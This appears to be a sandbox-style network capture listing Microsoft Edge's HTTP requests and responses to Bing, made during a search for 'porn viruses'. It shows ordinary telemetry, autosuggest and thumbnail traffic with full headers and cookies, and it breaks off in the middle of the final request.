GET

https://www.bing.com/fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1728144332051%2C%22Name%22%3A%22Perm_Denied%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1728144332051%2C%22Name%22%3A%22Perm_Denied%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; USRLOC=HS=1&BLOCK=TS=241005160532

Response

HTTP/1.1 200 OK

Content-Length: 0
Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:05:33 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bd777b5c.1728144333.184e956d
GET

https://www.bing.com/fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&TYPE=Event.ClientInst&DATA=%5B%7B%22Fallback%22%3A%221%22%2C%22ShowAnimation%22%3A%22%22%2C%22RedDotAnimation%22%3A%22true%22%2C%22RedemptionAnimationState%22%3A%22%22%2C%22FID%22%3A%22ModernRewardsFlyout%22%2C%22EventName%22%3A%22AnimationLoad%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144332372%2C%22Name%22%3A%22AnimationLoad%22%7D%5D

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&TYPE=Event.ClientInst&DATA=%5B%7B%22Fallback%22%3A%221%22%2C%22ShowAnimation%22%3A%22%22%2C%22RedDotAnimation%22%3A%22true%22%2C%22RedemptionAnimationState%22%3A%22%22%2C%22FID%22%3A%22ModernRewardsFlyout%22%2C%22EventName%22%3A%22AnimationLoad%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144332372%2C%22Name%22%3A%22AnimationLoad%22%7D%5D HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; USRLOC=HS=1&BLOCK=TS=241005160532

Response

HTTP/1.1 200 OK

Content-Length: 0
Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:05:33 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bd777b5c.1728144333.184e96bd
GET

https://www.bing.com/AS/Suggestions?pt=page.serp&bq=porn+viruses&mkt=nl-nl&qry=por&cp=3&csr=1&msbqf=false&pths=1&cvid=0DD30F05AB304142B388EAD39E0E9879

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /AS/Suggestions?pt=page.serp&bq=porn+viruses&mkt=nl-nl&qry=por&cp=3&csr=1&msbqf=false&pths=1&cvid=0DD30F05AB304142B388EAD39E0E9879 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
X-Autosuggest-ContentWidth: 650
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; USRLOC=HS=1&BLOCK=TS=241005160532; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl

Response

HTTP/1.1 200 OK

Content-Length: 908
Content-Type: application/json; charset=utf-8
Cache-Control: private, max-age=300
Content-Encoding: gzip
Vary: Accept-Encoding
X-EventID: 670163d12f684d1a82b4ffab06b2e243
X-AS-SetSessionMarket: nl-nl
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-Bgy3JoOkZUhceaCVEMyyc+91n9KpAz0aYiMh9PG0z44='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Sat, 05 Oct 2024 16:05:37 GMT
Connection: keep-alive
Set-Cookie: _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; domain=.bing.com; path=/; HttpOnly
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bd777b5c.1728144337.184e976c
GET

https://www.bing.com/th?id=OSK.56075d82803f36bef7e22272b297403f&w=120&h=120&c=6&p=0&pid=RS

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /th?id=OSK.56075d82803f36bef7e22272b297403f&w=120&h=120&c=6&p=0&pid=RS HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; USRLOC=HS=1&BLOCK=TS=241005160532; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl

Response

HTTP/1.1 200 OK

Cache-Control: public, max-age=2592000
Content-Type: image/jpeg
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Timing-Allow-Origin: *
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Content-Length: 3561
Date: Sat, 05 Oct 2024 16:05:38 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bd777b5c.1728144338.184eb6ec
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

92.123.128.189:443

Request

POST /fd/ls/lsp.aspx HTTP/1.1
Host: www.bing.com
Connection: keep-alive
Content-Length: 22996
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
Content-Type: text/xml
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; USRLOC=HS=1&BLOCK=TS=241005160532; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl

Response

HTTP/1.1 204 No Content

Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:05:39 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bd777b5c.1728144339.184ebc8a
GET

https://www.bing.com/AS/Suggestions?pt=page.serp&bq=porn+viruses&mkt=nl-nl&qry=v&cp=1&csr=1&msbqf=false&pths=1&cvid=0DD30F05AB304142B388EAD39E0E9879

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /AS/Suggestions?pt=page.serp&bq=porn+viruses&mkt=nl-nl&qry=v&cp=1&csr=1&msbqf=false&pths=1&cvid=0DD30F05AB304142B388EAD39E0E9879 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
X-Autosuggest-ContentWidth: 650
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4

Response

HTTP/1.1 200 OK

Content-Length: 1102
Content-Type: application/json; charset=utf-8
Cache-Control: private, max-age=300
Content-Encoding: gzip
Vary: Accept-Encoding
X-EventID: 670163d401fe481caf540d958db87634
X-AS-SetSessionMarket: nl-nl
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-Wg+wyJJLxrM9+8tCU1Zhhub/a7u6/VmwPjSSQ27u46w='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Sat, 05 Oct 2024 16:05:40 GMT
Connection: keep-alive
Set-Cookie: _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; domain=.bing.com; path=/; HttpOnly
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bd777b5c.1728144340.184ec051
GET

https://www.bing.com/th?id=OIP.ApkJS9QGG_goYQeyHaLw5AHaFj&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /th?id=OIP.ApkJS9QGG_goYQeyHaLw5AHaFj&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
